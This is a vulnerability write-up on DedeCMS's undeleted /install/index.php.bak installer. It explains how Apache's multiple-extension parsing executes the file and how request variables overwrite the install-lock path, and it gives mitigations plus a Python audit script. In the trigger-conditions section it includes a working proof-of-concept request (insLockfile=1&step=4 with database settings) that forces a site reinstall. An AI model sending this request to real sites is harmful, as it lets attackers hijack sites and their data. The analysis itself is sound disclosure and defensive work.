dedecms /install/index.php.bak Installation File Not Deleted && Executed Via Apache Analytic Vul
2015-05-15 13:40
656 views
Contents
1. Vulnerability description
2. Trigger conditions
3. Affected scope
4. Vulnerable code analysis
5. Mitigation
6. Offensive and defensive thoughts
1. Vulnerability description
A summary of how this vulnerability comes about:

1. By default DedeCMS does not delete the install directory once installation finishes. The installer script is still there, merely renamed: after installation DedeCMS backs up /install/index.php to /install/index.php.bak.
2. Apache has a parsing quirk (mod_mime multiple-extension handling): it treats every dot-separated suffix of a file name as an extension, ignores the ones it has no mapping for, and hands the file to the first handler it does find. index.php.bak is therefore processed as if it were index.php. Note that this only happens when PHP is mapped with AddHandler/AddType; if PHP is wired up with SetHandler inside <FilesMatch "\.php$">, only names that actually end in .php match, and index.php.bak is served as a static file.
3. DedeCMS makes heavy use of a home-grown emulation of register_globals, which copies every request key into a same-named local variable:

```php
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
```

An attacker can therefore pass a chosen variable name in the request to alter the script's normal control flow, bypass DedeCMS's "already installed" check, and reinstall the site.
Relevant Link:
http://zhanzhang.anquan.org/vul-detail/51b19a3ff159c80f0ab0b8a1/
2. Trigger conditions
1. The install directory still exists (and with it /install/index.php.bak).
2. Apache's multiple-extension parsing executes index.php.bak as PHP.

0x1: POC

GET http://www.cnseay.com/dedecms/install/index.php.bak?insLockfile=1&step=4
POST body:
step=4&dbhost=localhost&dbuser=root&dbpwd=123456&dbprefix=dede_&dbname=dedecms1&dblang=gbk&

insLockfile=1 overwrites the path the script passes to file_exists(), so the "already installed" guard is skipped and the installer continues at the database-configuration step (step=4). dbhost can be pointed at a remote database controlled by the attacker, hijacking the site's data.
3. Affected scope
4. Vulnerable code analysis
/install/index.php.bak

```php
// ...
foreach(Array('_GET','_POST','_COOKIE') as $_request)
{
    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
}
require_once(DEDEINC.'/common.func.php');
// Local variable injection: a request parameter named insLockfile overwrites
// $insLockfile (set earlier in the script to the install_lock.txt path),
// so the check below no longer looks at the real lock file
if(file_exists($insLockfile))
{
    exit(" The program has already been installed. If you really want to reinstall, first delete install/install_lock.txt via FTP!");
}
// ...
```
Relevant Link:
http://www.cnseay.com/2956/
5. Mitigation
1. Delete the install directory; or
2. Delete /install/index.php.bak; or
3. Keep the reinstall feature available but patch index.php.bak so that the lock check no longer depends on a variable the request can overwrite.

/install/index.php.bak

```php
if( file_exists(dirname(__FILE__).'/install_lock.txt') )
{
    exit(" The program has already been installed. If you really want to reinstall, first delete install/install_lock.txt via FTP!");
}
```

This patch hardens only the lock check. The variable-registration loop still runs, so every other local variable in the installer remains overridable from the request; options 1 or 2 are the safer choice.
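The script below is an added example, not DedeCMS, Apache or the author's code. It models the two mechanisms from section 1 (Apache's multiple-extension handling under an AddHandler mapping versus a FilesMatch "\.php$" SetHandler, and the register_globals-style loop that lets insLockfile=1 override the lock path) and turns section 5 into a check: a small audit that lists leftover installer files under a webroot and says whether the configured handler style would execute them. The PHP extension set, the FilesMatch pattern, and the temporary webroot it builds are constructed assumptions.

```python
# Added example (not DedeCMS, Apache or the author's code): a Python model of
# the Apache extension handling and the variable-override bug, plus an audit
# helper for leftover installer files. Extensions, patterns and sample files
# are illustrative assumptions.
import os
import re
import tempfile

# Extensions a typical `AddHandler application/x-httpd-php .php` style
# configuration maps to PHP (assumed; adjust to the real httpd.conf).
PHP_EXTS = frozenset({".php", ".php5", ".phtml"})


def apache_handler_for(filename, add_handler_exts=PHP_EXTS, files_match=None):
    """Return "php" if Apache would pass the file to PHP, otherwise None.

    mod_mime treats every dot-separated part after the base name as an
    extension and ignores the ones it has no mapping for, so under an
    AddHandler/AddType mapping 'index.php.bak' still reaches the PHP
    handler. If PHP is instead wired up with
    <FilesMatch "\\.php$"> SetHandler ... </FilesMatch>, only names ending
    in .php match and 'index.php.bak' is served as a static file.
    """
    base = os.path.basename(filename)
    if files_match is not None:
        return "php" if re.search(files_match, base) else None
    exts = {"." + part.lower() for part in base.split(".")[1:]}
    return "php" if exts & add_handler_exts else None


def vulnerable_lock_check(request, install_dir):
    """Model of the flawed check in /install/index.php.bak.

    The script sets $insLockfile to the lock-file path, then copies every
    GET/POST/COOKIE key into a same-named local variable, so a request
    carrying insLockfile=1 replaces the path before file_exists() runs.
    Returns True when the reinstall is blocked.
    """
    scope = {"insLockfile": os.path.join(install_dir, "install_lock.txt")}
    scope.update(request)  # the foreach(...) ${$_k} = RunMagicQuotes($_v) loop
    return os.path.exists(scope["insLockfile"])


def fixed_lock_check(request, install_dir):
    """The patched check: the lock path is a literal, request data cannot reach it."""
    return os.path.exists(os.path.join(install_dir, "install_lock.txt"))


def audit_install_dir(webroot, files_match=None):
    """Return [(relative path, executable_as_php)] for leftover installer
    files under <webroot>/install, using the handler model above."""
    findings = []
    install_dir = os.path.join(webroot, "install")
    if not os.path.isdir(install_dir):
        return findings
    for name in sorted(os.listdir(install_dir)):
        if ".php" in name:
            runs = apache_handler_for(name, files_match=files_match) == "php"
            findings.append(("install/" + name, runs))
    return findings


def demo():
    """Build a constructed DedeCMS-like webroot in a temp dir and exercise the checks."""
    with tempfile.TemporaryDirectory() as webroot:
        install_dir = os.path.join(webroot, "install")
        os.mkdir(install_dir)
        for name in ("index.php.bak", "install_lock.txt"):
            with open(os.path.join(install_dir, name), "w") as f:
                f.write("constructed sample\n")
        # Parameters taken from the PoC request: ?insLockfile=1&step=4
        poc = {"insLockfile": "1", "step": "4"}
        return {
            "addhandler_runs_bak": apache_handler_for("index.php.bak") == "php",
            "filesmatch_runs_bak": apache_handler_for("index.php.bak", files_match=r"\.php$") == "php",
            "vulnerable_blocked": vulnerable_lock_check(poc, install_dir),
            "fixed_blocked": fixed_lock_check(poc, install_dir),
            "audit": audit_install_dir(webroot),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the lock file present on disk yet the vulnerable check reporting "not blocked" for the PoC parameters, while the literal-path check stays blocked; the audit flags install/index.php.bak as executable under the AddHandler model and as inert under the FilesMatch one.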
6. Offensive and defensive thoughts
At critical if-conditions in the code, avoid relying on variables wherever possible; this goes a long way toward preventing local-variable overriding from letting an attacker inject changes into the control flow.
Copyright (c) 2015 LittleHann All rights reserved